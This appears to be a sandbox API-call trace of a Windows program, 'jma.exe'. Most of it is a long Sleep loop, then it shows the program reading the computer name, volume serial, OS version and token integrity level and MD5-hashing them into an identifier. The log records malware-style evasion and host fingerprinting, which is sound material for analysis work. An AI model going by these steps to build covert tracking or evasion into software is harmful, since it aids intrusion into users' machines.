(dwMilliseconds=0xa) [0079.709] Sleep (dwMilliseconds=0xa) [0079.725] Sleep (dwMilliseconds=0xa) [0079.740] Sleep (dwMilliseconds=0xa) [0079.756] Sleep (dwMilliseconds=0xa) [0079.771] Sleep (dwMilliseconds=0xa) [0079.787] Sleep (dwMilliseconds=0xa) [0079.803] Sleep (dwMilliseconds=0xa) [0079.823] Sleep (dwMilliseconds=0xa) [0079.834] Sleep (dwMilliseconds=0xa) [0079.850] Sleep (dwMilliseconds=0xa) [0079.865] Sleep (dwMilliseconds=0xa) [0079.881] Sleep (dwMilliseconds=0xa) [0079.896] Sleep (dwMilliseconds=0xa) [0079.914] Sleep (dwMilliseconds=0xa) [0079.928] Sleep (dwMilliseconds=0xa) [0079.948] Sleep (dwMilliseconds=0xa) [0079.959] Sleep (dwMilliseconds=0xa) [0079.974] Sleep (dwMilliseconds=0xa) [0079.990] Sleep (dwMilliseconds=0xa) [0080.005] Sleep (dwMilliseconds=0xa) [0080.021] Sleep (dwMilliseconds=0xa) [0080.037] Sleep (dwMilliseconds=0xa) [0080.052] Sleep (dwMilliseconds=0xa) [0080.072] Sleep (dwMilliseconds=0xa) [0080.083] Sleep (dwMilliseconds=0xa) [0080.099] Sleep (dwMilliseconds=0xa) [0080.115] Sleep (dwMilliseconds=0xa) [0080.130] Sleep (dwMilliseconds=0xa) [0080.147] Sleep (dwMilliseconds=0xa) [0080.161] Sleep (dwMilliseconds=0xa) [0080.177] Sleep (dwMilliseconds=0xa) [0080.197] Sleep (dwMilliseconds=0xa) [0080.208] Sleep (dwMilliseconds=0xa) [0080.224] Sleep (dwMilliseconds=0xa) [0080.240] Sleep (dwMilliseconds=0xa) [0080.256] Sleep (dwMilliseconds=0xa) [0080.271] Sleep (dwMilliseconds=0xa) [0080.286] Sleep (dwMilliseconds=0xa) [0080.302] Sleep (dwMilliseconds=0xa) [0080.322] Sleep (dwMilliseconds=0xa) [0080.333] Sleep (dwMilliseconds=0xa) [0080.349] Sleep (dwMilliseconds=0xa) [0080.364] Sleep (dwMilliseconds=0xa) [0080.380] Sleep (dwMilliseconds=0xa) [0080.396] Sleep (dwMilliseconds=0xa) [0080.411] Sleep (dwMilliseconds=0xa) [0080.427] Sleep (dwMilliseconds=0xa) [0080.447] Sleep (dwMilliseconds=0xa) [0080.458] Sleep (dwMilliseconds=0xa) [0080.473] Sleep (dwMilliseconds=0xa) [0080.490] Sleep (dwMilliseconds=0xa) [0080.505] Sleep (dwMilliseconds=0xa) [0080.520] Sleep (dwMilliseconds=0xa) [0080.536] Sleep (dwMilliseconds=0xa) [0080.552] Sleep (dwMilliseconds=0xa) [0080.572] Sleep (dwMilliseconds=0xa) [0080.590] Sleep (dwMilliseconds=0xa) [0080.599] Sleep (dwMilliseconds=0xa) [0080.622] Sleep (dwMilliseconds=0xa) [0080.629] Sleep (dwMilliseconds=0xa) [0080.645] Sleep (dwMilliseconds=0xa) [0080.661] Sleep (dwMilliseconds=0xa) [0080.677] Sleep (dwMilliseconds=0xa) [0080.696] Sleep (dwMilliseconds=0xa) [0080.707] Sleep (dwMilliseconds=0xa) [0080.723] Sleep (dwMilliseconds=0xa) [0080.739] Sleep (dwMilliseconds=0xa) [0080.754] Sleep (dwMilliseconds=0xa) [0080.770] Sleep (dwMilliseconds=0xa) [0080.786] Sleep (dwMilliseconds=0xa) [0080.801] Sleep (dwMilliseconds=0xa) [0080.821] Sleep (dwMilliseconds=0xa) [0080.832] Sleep (dwMilliseconds=0xa) [0080.848] Sleep (dwMilliseconds=0xa) [0080.864] Sleep (dwMilliseconds=0xa) [0080.879] Sleep (dwMilliseconds=0xa) [0080.895] Sleep (dwMilliseconds=0xa) [0080.910] Sleep (dwMilliseconds=0xa) [0080.926] Sleep (dwMilliseconds=0xa) [0080.946] Sleep (dwMilliseconds=0xa) [0080.957] Sleep (dwMilliseconds=0xa) [0080.973] Sleep (dwMilliseconds=0xa) [0080.989] Sleep (dwMilliseconds=0xa) [0081.006] Sleep (dwMilliseconds=0xa) [0081.020] Sleep (dwMilliseconds=0xa) [0081.035] Sleep (dwMilliseconds=0xa) [0081.051] Sleep (dwMilliseconds=0xa) [0081.071] Sleep (dwMilliseconds=0xa) [0081.082] Sleep (dwMilliseconds=0xa) [0081.097] Sleep (dwMilliseconds=0xa) [0081.113] Sleep (dwMilliseconds=0xa) [0081.129] Sleep (dwMilliseconds=0xa) [0081.144] Sleep (dwMilliseconds=0xa) [0081.160] Sleep (dwMilliseconds=0xa) [0081.176] Sleep (dwMilliseconds=0xa) [0081.196] Sleep (dwMilliseconds=0xa) [0081.207] Sleep (dwMilliseconds=0xa) [0081.222] Sleep (dwMilliseconds=0xa) [0081.238] Sleep (dwMilliseconds=0xa) [0081.253] Sleep (dwMilliseconds=0xa) [0081.269] Sleep (dwMilliseconds=0xa) [0081.285] Sleep (dwMilliseconds=0xa) [0081.300] Sleep (dwMilliseconds=0xa) [0081.324] Sleep (dwMilliseconds=0xa) [0081.331] Sleep (dwMilliseconds=0xa) [0081.349] Sleep (dwMilliseconds=0xa) [0081.363] Sleep (dwMilliseconds=0xa) [0081.378] Sleep (dwMilliseconds=0xa) [0081.394] Sleep (dwMilliseconds=0xa) [0081.409] Sleep (dwMilliseconds=0xa) [0081.425] Sleep (dwMilliseconds=0xa) [0081.445] Sleep (dwMilliseconds=0xa) [0081.456] Sleep (dwMilliseconds=0xa) [0081.472] Sleep (dwMilliseconds=0xa) [0081.488] Sleep (dwMilliseconds=0xa) [0081.503] Sleep (dwMilliseconds=0xa) [0081.519] Sleep (dwMilliseconds=0xa) [0081.534] Sleep (dwMilliseconds=0xa) [0081.550] Sleep (dwMilliseconds=0xa) [0081.570] Sleep (dwMilliseconds=0xa) [0081.581] Sleep (dwMilliseconds=0xa) [0081.606] Sleep (dwMilliseconds=0xa) [0081.612] Sleep (dwMilliseconds=0xa) [0081.628] Sleep (dwMilliseconds=0xa) [0081.644] Sleep (dwMilliseconds=0xa) [0081.659] Sleep (dwMilliseconds=0xa) [0081.675] Sleep (dwMilliseconds=0xa) [0081.695] Sleep (dwMilliseconds=0xa) [0081.706] Sleep (dwMilliseconds=0xa) [0081.729] Sleep (dwMilliseconds=0xa) [0081.737] Sleep (dwMilliseconds=0xa) [0081.753] Sleep (dwMilliseconds=0xa) [0081.768] Sleep (dwMilliseconds=0xa) [0081.784] Sleep (dwMilliseconds=0xa) [0081.800] Sleep (dwMilliseconds=0xa) [0081.820] Sleep (dwMilliseconds=0xa) [0081.831] Sleep (dwMilliseconds=0xa) [0081.846] Sleep (dwMilliseconds=0xa) [0081.862] Sleep (dwMilliseconds=0xa) [0081.878] Sleep (dwMilliseconds=0xa) [0081.893] Sleep (dwMilliseconds=0xa) [0081.909] Sleep (dwMilliseconds=0xa) [0081.924] Sleep (dwMilliseconds=0xa) [0081.944] Sleep (dwMilliseconds=0xa) [0081.956] Sleep (dwMilliseconds=0xa) [0081.971] Sleep (dwMilliseconds=0xa) [0081.987] Sleep (dwMilliseconds=0xa) [0082.002] Sleep (dwMilliseconds=0xa) [0082.018] Sleep (dwMilliseconds=0xa) [0082.034] Sleep (dwMilliseconds=0xa) [0082.049] Sleep (dwMilliseconds=0xa) [0082.069] Sleep (dwMilliseconds=0xa) [0082.081] Sleep (dwMilliseconds=0xa) [0082.096] Sleep (dwMilliseconds=0xa) [0082.112] Sleep (dwMilliseconds=0xa) [0082.127] Sleep (dwMilliseconds=0xa) [0082.143] Sleep (dwMilliseconds=0xa) [0082.158] Sleep (dwMilliseconds=0xa) [0082.174] Sleep (dwMilliseconds=0xa) [0082.194] Sleep (dwMilliseconds=0xa) [0082.205] Sleep (dwMilliseconds=0xa) [0082.221] Sleep (dwMilliseconds=0xa) [0082.236] Sleep (dwMilliseconds=0xa) [0082.252] Sleep (dwMilliseconds=0xa) [0082.268] Sleep (dwMilliseconds=0xa) [0082.283] Sleep (dwMilliseconds=0xa) [0082.299] Sleep (dwMilliseconds=0xa) [0082.324] Sleep (dwMilliseconds=0xa) [0082.330] Sleep (dwMilliseconds=0xa) [0082.346] Sleep (dwMilliseconds=0xa) [0082.361] Sleep (dwMilliseconds=0xa) [0082.377] Sleep (dwMilliseconds=0xa) [0082.392] Sleep (dwMilliseconds=0xa) [0082.408] Sleep (dwMilliseconds=0xa) [0082.424] Sleep (dwMilliseconds=0xa) [0082.443] Sleep (dwMilliseconds=0xa) [0082.455] Sleep (dwMilliseconds=0xa) [0082.470] Sleep (dwMilliseconds=0xa) [0082.486] Sleep (dwMilliseconds=0xa) [0082.501] Sleep (dwMilliseconds=0xa) [0082.517] Sleep (dwMilliseconds=0xa) [0082.533] Sleep (dwMilliseconds=0xa) [0082.548] Sleep (dwMilliseconds=0xa) [0082.568] Sleep (dwMilliseconds=0xa) [0082.580] Sleep (dwMilliseconds=0xa) [0082.601] Sleep (dwMilliseconds=0xa) [0082.611] Sleep (dwMilliseconds=0xa) [0082.627] Sleep (dwMilliseconds=0xa) [0082.642] Sleep (dwMilliseconds=0xa) [0082.658] Sleep (dwMilliseconds=0xa) [0082.673] Sleep (dwMilliseconds=0xa) [0082.693] Sleep (dwMilliseconds=0xa) [0082.704] Sleep (dwMilliseconds=0xa) [0082.720] Sleep (dwMilliseconds=0xa) [0082.743] Sleep (dwMilliseconds=0xa) [0082.751] Sleep (dwMilliseconds=0xa) [0082.767] Sleep (dwMilliseconds=0xa) [0082.782] Sleep (dwMilliseconds=0xa) [0082.798] Sleep (dwMilliseconds=0xa) [0082.818] Sleep (dwMilliseconds=0xa) [0082.829] Sleep (dwMilliseconds=0xa) [0082.845] Sleep (dwMilliseconds=0xa) [0082.860] Sleep (dwMilliseconds=0xa) [0082.876] Sleep (dwMilliseconds=0xa) [0082.892] Sleep (dwMilliseconds=0xa) [0082.907] Sleep (dwMilliseconds=0xa) [0082.923] Sleep (dwMilliseconds=0xa) [0082.943] Sleep (dwMilliseconds=0xa) [0082.954] Sleep (dwMilliseconds=0xa) [0082.970] Sleep (dwMilliseconds=0xa) [0082.986] Sleep (dwMilliseconds=0xa) [0083.003] Sleep (dwMilliseconds=0xa) [0083.027] Sleep (dwMilliseconds=0xa) [0083.032] Sleep (dwMilliseconds=0xa) [0083.048] Sleep (dwMilliseconds=0xa) [0083.068] Sleep (dwMilliseconds=0xa) [0083.079] Sleep (dwMilliseconds=0xa) [0083.094] Sleep (dwMilliseconds=0xa) [0083.110] Sleep (dwMilliseconds=0xa) [0083.125] Sleep (dwMilliseconds=0xa) [0083.141] Sleep (dwMilliseconds=0xa) [0083.157] Sleep (dwMilliseconds=0xa) [0083.173] Sleep (dwMilliseconds=0xa) [0083.193] Sleep (dwMilliseconds=0xa) [0083.204] Sleep (dwMilliseconds=0xa) [0083.219] Sleep (dwMilliseconds=0xa) [0083.235] Sleep (dwMilliseconds=0xa) [0083.250] Sleep (dwMilliseconds=0xa) [0083.266] Sleep (dwMilliseconds=0xa) [0083.282] Sleep (dwMilliseconds=0xa) [0083.297] Sleep (dwMilliseconds=0xa) [0083.317] Sleep (dwMilliseconds=0xa) [0083.328] Sleep (dwMilliseconds=0xa) [0083.344] Sleep (dwMilliseconds=0xa) [0083.360] Sleep (dwMilliseconds=0xa) [0083.375] Sleep (dwMilliseconds=0xa) [0083.391] Sleep (dwMilliseconds=0xa) [0083.406] Sleep (dwMilliseconds=0xa) [0083.422] Sleep (dwMilliseconds=0xa) [0083.442] Sleep (dwMilliseconds=0xa) [0083.453] Sleep (dwMilliseconds=0xa) [0083.469] Sleep (dwMilliseconds=0xa) [0083.484] Sleep (dwMilliseconds=0xa) [0083.500] Sleep (dwMilliseconds=0xa) [0083.516] Sleep (dwMilliseconds=0xa) [0083.531] Sleep (dwMilliseconds=0xa) [0083.547] Sleep (dwMilliseconds=0xa) [0083.567] Sleep (dwMilliseconds=0xa) [0083.578] Sleep (dwMilliseconds=0xa) [0083.600] Sleep (dwMilliseconds=0xa) [0083.610] Sleep (dwMilliseconds=0xa) [0083.625] Sleep (dwMilliseconds=0xa) [0083.640] Sleep (dwMilliseconds=0xa) [0083.656] Sleep (dwMilliseconds=0xa) [0083.672] Sleep (dwMilliseconds=0xa) [0083.692] Sleep (dwMilliseconds=0xa) [0083.703] Sleep (dwMilliseconds=0xa) [0083.718] Sleep (dwMilliseconds=0xa) [0083.734] Sleep (dwMilliseconds=0xa) [0083.757] Sleep (dwMilliseconds=0xa) [0083.765] Sleep (dwMilliseconds=0xa) [0083.781] Sleep (dwMilliseconds=0xa) [0083.796] Sleep (dwMilliseconds=0xa) [0083.817] Sleep (dwMilliseconds=0xa) [0083.836] Sleep (dwMilliseconds=0xa) [0083.843] Sleep (dwMilliseconds=0xa) [0083.860] Sleep (dwMilliseconds=0xa) [0083.874] Sleep (dwMilliseconds=0xa) [0083.890] Sleep (dwMilliseconds=0xa) [0083.906] Sleep (dwMilliseconds=0xa) [0083.921] Sleep (dwMilliseconds=0xa) [0083.942] Sleep (dwMilliseconds=0xa) [0083.953] Sleep (dwMilliseconds=0xa) [0083.968] Sleep (dwMilliseconds=0xa) [0083.984] Sleep (dwMilliseconds=0xa) [0083.999] Sleep (dwMilliseconds=0xa) [0084.015] Sleep (dwMilliseconds=0xa) [0084.031] Sleep (dwMilliseconds=0xa) [0084.046] Sleep (dwMilliseconds=0xa) [0084.066] Sleep (dwMilliseconds=0xa) [0084.077] Sleep (dwMilliseconds=0xa) [0084.093] Sleep (dwMilliseconds=0xa) [0084.108] Sleep (dwMilliseconds=0xa) [0084.124] Sleep (dwMilliseconds=0xa) [0084.140] Sleep (dwMilliseconds=0xa) [0084.155] Sleep (dwMilliseconds=0xa) [0084.171] Sleep (dwMilliseconds=0xa) [0084.191] Sleep (dwMilliseconds=0xa) [0084.202] Sleep (dwMilliseconds=0xa) [0084.218] Sleep (dwMilliseconds=0xa) [0084.233] Sleep (dwMilliseconds=0xa) [0084.249] Sleep (dwMilliseconds=0xa) [0084.264] Sleep (dwMilliseconds=0xa) [0084.280] Sleep (dwMilliseconds=0xa) [0084.296] Sleep (dwMilliseconds=0xa) [0084.318] Sleep (dwMilliseconds=0xa) [0084.327] Sleep (dwMilliseconds=0xa) [0084.342] Sleep (dwMilliseconds=0xa) [0084.358] Sleep (dwMilliseconds=0xa) [0084.374] Sleep (dwMilliseconds=0xa) [0084.389] Sleep (dwMilliseconds=0xa) [0084.405] Sleep (dwMilliseconds=0xa) [0084.420] Sleep (dwMilliseconds=0xa) [0084.441] Sleep (dwMilliseconds=0xa) [0084.452] Sleep (dwMilliseconds=0xa) [0084.467] Sleep (dwMilliseconds=0xa) [0084.483] Sleep (dwMilliseconds=0xa) [0084.498] Sleep (dwMilliseconds=0xa) [0084.514] Sleep (dwMilliseconds=0xa) [0084.530] Sleep (dwMilliseconds=0xa) [0084.545] Sleep (dwMilliseconds=0xa) [0084.566] Sleep (dwMilliseconds=0xa) [0084.577] Sleep (dwMilliseconds=0xa) [0084.599] Sleep (dwMilliseconds=0xa) [0084.608] Sleep (dwMilliseconds=0xa) [0084.623] Sleep (dwMilliseconds=0xa) [0084.639] Sleep (dwMilliseconds=0xa) [0084.654] Sleep (dwMilliseconds=0xa) [0084.670] Sleep (dwMilliseconds=0xa) [0084.691] Sleep (dwMilliseconds=0xa) [0084.701] Sleep (dwMilliseconds=0xa) [0084.717] Sleep (dwMilliseconds=0xa) [0084.732] Sleep (dwMilliseconds=0xa) [0084.748] Sleep (dwMilliseconds=0xa) [0084.772] Sleep (dwMilliseconds=0xa) [0084.779] Sleep (dwMilliseconds=0xa) [0084.795] Sleep (dwMilliseconds=0xa) [0084.816] Sleep (dwMilliseconds=0xa) [0084.826] Sleep (dwMilliseconds=0xa) [0084.842] Sleep (dwMilliseconds=0xa) [0084.857] Sleep (dwMilliseconds=0xa) [0084.873] Sleep (dwMilliseconds=0xa) [0084.888] Sleep (dwMilliseconds=0xa) [0084.904] Sleep (dwMilliseconds=0xa) [0084.920] Sleep (dwMilliseconds=0xa) [0084.940] Sleep (dwMilliseconds=0xa) [0084.952] Sleep (dwMilliseconds=0xa) [0084.966] Sleep (dwMilliseconds=0xa) [0084.982] Sleep (dwMilliseconds=0xa) [0084.997] Sleep (dwMilliseconds=0xa) [0085.013] Sleep (dwMilliseconds=0xa) [0085.029] Sleep (dwMilliseconds=0xa) [0085.044] Sleep (dwMilliseconds=0xa) [0085.065] Sleep (dwMilliseconds=0xa) [0085.076] Sleep (dwMilliseconds=0xa) [0085.091] Sleep (dwMilliseconds=0xa) [0085.107] Sleep (dwMilliseconds=0xa) [0085.123] Sleep (dwMilliseconds=0xa) [0085.138] Sleep (dwMilliseconds=0xa) [0085.154] Sleep (dwMilliseconds=0xa) [0085.169] Sleep (dwMilliseconds=0xa) [0085.189] Sleep (dwMilliseconds=0xa) [0085.200] Sleep (dwMilliseconds=0xa) [0085.216] Sleep (dwMilliseconds=0xa) [0085.232] Sleep (dwMilliseconds=0xa) [0085.251] Sleep (dwMilliseconds=0xa) [0085.263] Sleep (dwMilliseconds=0xa) [0085.278] Sleep (dwMilliseconds=0xa) [0085.294] Sleep (dwMilliseconds=0xa) [0085.313] Sleep (dwMilliseconds=0xa) [0085.325] Sleep (dwMilliseconds=0xa) [0085.343] Sleep (dwMilliseconds=0xa) [0085.356] Sleep (dwMilliseconds=0xa) [0085.372] Sleep (dwMilliseconds=0xa) [0085.388] Sleep (dwMilliseconds=0xa) [0085.403] Sleep (dwMilliseconds=0xa) [0085.419] Sleep (dwMilliseconds=0xa) [0085.438] Sleep (dwMilliseconds=0xa) [0085.450] Sleep (dwMilliseconds=0xa) [0085.465] Sleep (dwMilliseconds=0xa) [0085.481] Sleep (dwMilliseconds=0xa) [0085.497] Sleep (dwMilliseconds=0xa) [0085.512] Sleep (dwMilliseconds=0xa) [0085.528] Sleep (dwMilliseconds=0xa) [0085.544] Sleep (dwMilliseconds=0xa) [0085.563] Sleep (dwMilliseconds=0xa) [0085.575] Sleep (dwMilliseconds=0xa) [0085.597] Sleep (dwMilliseconds=0xa) [0085.606] Sleep (dwMilliseconds=0xa) [0085.622] Sleep (dwMilliseconds=0xa) [0085.637] Sleep (dwMilliseconds=0xa) [0085.653] Sleep (dwMilliseconds=0xa) [0085.669] Sleep (dwMilliseconds=0xa) [0085.688] Sleep (dwMilliseconds=0xa) [0085.700] Sleep (dwMilliseconds=0xa) [0085.715] Sleep (dwMilliseconds=0xa) [0085.731] Sleep (dwMilliseconds=0xa) [0085.746] Sleep (dwMilliseconds=0xa) [0085.762] Sleep (dwMilliseconds=0xa) [0085.785] Sleep (dwMilliseconds=0xa) [0085.793] Sleep (dwMilliseconds=0xa) [0085.813] Sleep (dwMilliseconds=0xa) [0085.824] Sleep (dwMilliseconds=0xa) [0085.840] Sleep (dwMilliseconds=0xa) [0085.856] Sleep (dwMilliseconds=0xa) [0085.871] Sleep (dwMilliseconds=0xa) [0085.887] Sleep (dwMilliseconds=0xa) [0085.902] Sleep (dwMilliseconds=0xa) [0085.918] Sleep (dwMilliseconds=0xa) [0085.938] Sleep (dwMilliseconds=0xa) [0085.949] Sleep (dwMilliseconds=0xa) [0085.965] Sleep (dwMilliseconds=0xa) [0085.982] Sleep (dwMilliseconds=0xa) [0085.996] Sleep (dwMilliseconds=0xa) [0086.011] Sleep (dwMilliseconds=0xa) [0086.027] Sleep (dwMilliseconds=0xa) [0086.043] Sleep (dwMilliseconds=0xa) [0086.063] Sleep (dwMilliseconds=0xa) [0086.074] Sleep (dwMilliseconds=0xa) [0086.089] Sleep (dwMilliseconds=0xa) [0086.105] Sleep (dwMilliseconds=0xa) [0086.121] Sleep (dwMilliseconds=0xa) [0086.136] Sleep (dwMilliseconds=0xa) [0086.152] Sleep (dwMilliseconds=0xa) [0086.168] Sleep (dwMilliseconds=0xa) [0086.187] Sleep (dwMilliseconds=0xa) [0086.199] Sleep (dwMilliseconds=0xa) [0086.215] Sleep (dwMilliseconds=0xa) [0086.230] Sleep (dwMilliseconds=0xa) [0086.245] Sleep (dwMilliseconds=0xa) [0086.261] Sleep (dwMilliseconds=0xa) [0086.277] Sleep (dwMilliseconds=0xa) [0086.292] Sleep (dwMilliseconds=0xa) [0086.313] Sleep (dwMilliseconds=0xa) [0086.324] Sleep (dwMilliseconds=0xa) [0086.339] Sleep (dwMilliseconds=0xa) [0086.355] Sleep (dwMilliseconds=0xa) [0086.370] Sleep (dwMilliseconds=0xa) [0086.386] Sleep (dwMilliseconds=0xa) [0086.401] Sleep (dwMilliseconds=0xa) [0086.417] Sleep (dwMilliseconds=0xa) [0086.437] Sleep (dwMilliseconds=0xa) [0086.448] Sleep (dwMilliseconds=0xa) [0086.464] Sleep (dwMilliseconds=0xa) [0086.479] Sleep (dwMilliseconds=0xa) [0086.495] Sleep (dwMilliseconds=0xa) [0086.511] Sleep (dwMilliseconds=0xa) [0086.526] Sleep (dwMilliseconds=0xa) [0086.542] Sleep (dwMilliseconds=0xa) [0086.562] Sleep (dwMilliseconds=0xa) [0086.573] Sleep (dwMilliseconds=0xa) [0086.594] Sleep (dwMilliseconds=0xa) [0086.604] Sleep (dwMilliseconds=0xa) [0086.620] Sleep (dwMilliseconds=0xa) [0086.636] Sleep (dwMilliseconds=0xa) [0086.651] Sleep (dwMilliseconds=0xa) [0086.667] Sleep (dwMilliseconds=0xa) [0086.686] Sleep (dwMilliseconds=0xa) [0086.698] Sleep (dwMilliseconds=0xa) [0086.713] Sleep (dwMilliseconds=0xa) [0086.729] Sleep (dwMilliseconds=0xa) [0086.745] Sleep (dwMilliseconds=0xa) [0086.760] Sleep (dwMilliseconds=0xa) [0086.776] Sleep (dwMilliseconds=0xa) [0086.799] Sleep (dwMilliseconds=0xa) [0086.819] Sleep (dwMilliseconds=0xa) [0086.823] Sleep (dwMilliseconds=0xa) [0086.838] Sleep (dwMilliseconds=0xa) [0086.854] Sleep (dwMilliseconds=0xa) [0086.870] Sleep (dwMilliseconds=0xa) [0086.885] Sleep (dwMilliseconds=0xa) [0086.901] Sleep (dwMilliseconds=0xa) [0086.916] Sleep (dwMilliseconds=0xa) [0086.936] Sleep (dwMilliseconds=0xa) [0086.951] Sleep (dwMilliseconds=0xa) [0086.963] Sleep (dwMilliseconds=0xa) [0086.979] Sleep (dwMilliseconds=0xa) [0086.995] Sleep (dwMilliseconds=0xa) [0087.010] Sleep (dwMilliseconds=0xa) [0087.025] Sleep (dwMilliseconds=0xa) [0087.041] Sleep (dwMilliseconds=0xa) [0087.061] Sleep (dwMilliseconds=0xa) [0087.072] Sleep (dwMilliseconds=0xa) [0087.088] Sleep (dwMilliseconds=0xa) [0087.104] Sleep (dwMilliseconds=0xa) [0087.119] Sleep (dwMilliseconds=0xa) [0087.135] Sleep (dwMilliseconds=0xa) [0087.150] Sleep (dwMilliseconds=0xa) [0087.166] Sleep (dwMilliseconds=0xa) [0087.186] Sleep (dwMilliseconds=0xa) [0087.197] Sleep (dwMilliseconds=0xa) [0087.213] Sleep (dwMilliseconds=0xa) [0087.228] Sleep (dwMilliseconds=0xa) [0087.244] Sleep (dwMilliseconds=0xa) [0087.259] Sleep (dwMilliseconds=0xa) [0087.275] Sleep (dwMilliseconds=0xa) [0087.291] Sleep (dwMilliseconds=0xa) [0087.311] Sleep (dwMilliseconds=0xa) [0087.322] Sleep (dwMilliseconds=0xa) [0087.337] Sleep (dwMilliseconds=0xa) [0087.353] Sleep (dwMilliseconds=0xa) [0087.369] Sleep (dwMilliseconds=0xa) [0087.384] Sleep (dwMilliseconds=0xa) [0087.400] Sleep (dwMilliseconds=0xa) [0087.416] Sleep (dwMilliseconds=0xa) [0087.436] Sleep (dwMilliseconds=0xa) [0087.447] Sleep (dwMilliseconds=0xa) [0087.462] Sleep (dwMilliseconds=0xa) [0087.478] Sleep (dwMilliseconds=0xa) [0087.493] Sleep (dwMilliseconds=0xa) [0087.509] Sleep (dwMilliseconds=0xa) [0087.525] Sleep (dwMilliseconds=0xa) [0087.540] Sleep (dwMilliseconds=0xa) [0087.560] Sleep (dwMilliseconds=0xa) [0087.572] Sleep (dwMilliseconds=0xa) [0087.593] Sleep (dwMilliseconds=0xa) [0087.603] Sleep (dwMilliseconds=0xa) [0087.618] Sleep (dwMilliseconds=0xa) [0087.634] Sleep (dwMilliseconds=0xa) [0087.649] Sleep (dwMilliseconds=0xa) [0087.665] Sleep (dwMilliseconds=0xa) [0087.685] Sleep (dwMilliseconds=0xa) [0087.696] Sleep (dwMilliseconds=0xa) [0087.712] Sleep (dwMilliseconds=0xa) [0087.728] Sleep (dwMilliseconds=0xa) [0087.743] Sleep (dwMilliseconds=0xa) [0087.759] Sleep (dwMilliseconds=0xa) [0087.774] Sleep (dwMilliseconds=0xa) [0087.790] Sleep (dwMilliseconds=0xa) [0087.810] Sleep (dwMilliseconds=0xa) [0087.821] Sleep (dwMilliseconds=0xa) [0087.837] Sleep (dwMilliseconds=0xa) [0087.853] Sleep (dwMilliseconds=0xa) [0087.868] Sleep (dwMilliseconds=0xa) [0087.883] Sleep (dwMilliseconds=0xa) [0087.899] Sleep (dwMilliseconds=0xa) [0087.915] Sleep (dwMilliseconds=0xa) [0087.935] GetSystemDirectoryA (in: lpBuffer=0x696f760, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.935] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe" [0087.935] RtlGetVersion (in: lpVersionInformation=0x2da0447 | out: lpVersionInformation=0x2da0447*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0087.935] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x696f748 | out: TokenHandle=0x696f748*=0x58c) returned 1 [0087.935] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x696f740 | out: TokenInformation=0x0, ReturnLength=0x696f740) returned 0 [0087.935] GetProcessHeap () returned 0x2a0000 [0087.935] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x25) returned 0x4a3ef60 [0087.935] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x4a3ef60, TokenInformationLength=0x1c, ReturnLength=0x696f740 | out: TokenInformation=0x4a3ef60, ReturnLength=0x696f740) returned 1 [0087.935] GetSidSubAuthorityCount (pSid=0x4a3ef70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x4a3ef71 [0087.935] GetSidSubAuthority (pSid=0x4a3ef70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x4a3ef78 [0087.935] GetProcessHeap () returned 0x2a0000 [0087.935] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a3ef60) returned 1 [0087.935] CloseHandle (hObject=0x58c) returned 1 [0087.935] GetComputerNameA (in: lpBuffer=0x696f810, nSize=0x696f840 | out: lpBuffer="XDUWTFONO", nSize=0x696f840) returned 1 [0087.936] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x696f850, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x696f850*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0087.936] GetProcessHeap () returned 0x2a0000 [0087.936] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x29) returned 0x48e3530 [0087.936] wsprintfA (in: param_1=0x48e3530, param_2="%s%08X%08X" | out: param_1="XDUWTFONO0B0D4D069C354B42") returned 25 [0087.936] CryptAcquireContextA (in: phProv=0x696f788, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x696f788*=0x2b84910) returned 1 [0087.938] CryptCreateHash (in: hProv=0x2b84910, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x696f780 | out: phHash=0x696f780) returned 1 [0087.939] lstrlenA (lpString="XDUWTFONO0B0D4D069C354B42") returned 25 [0087.939] CryptHashData (hHash=0x768d700, pbData=0x48e3530, dwDataLen=0x19, dwFlags=0x0) returned 1 [0087.939] CryptGetHashParam (in: hHash=0x768d700, dwParam=0x2, pbData=0x696f790, pdwDataLen=0x696f7c0, dwFlags=0x0 | out: pbData=0x696f790, pdwDataLen=0x696f7c0) returned 1 [0087.939] wsprintfA (in: param_1=0x2da020c, param_2="%02X" | out: param_1="60") returned 2 [0087.939] wsprintfA (in: param_1=0x2da020e, param_2="%02X" | out: param_1="49") returned 2 [0087.939] wsprintfA (in: param_1=0x2da0210, param_2="%02X" | out: param_1="54") returned 2 [0087.939] wsprintfA (in: param_1=0x2da0212, param_2="%02X" | out: param_1="A4") returned 2 [0087.939] wsprintfA (in: param_1=0x2da0214, param_2="%02X" | out: param_1="50") returned 2 [0087.939] wsprintfA (in: param_1=0x2da0216, param_2="%02X" | out: param_1="75") returned 2 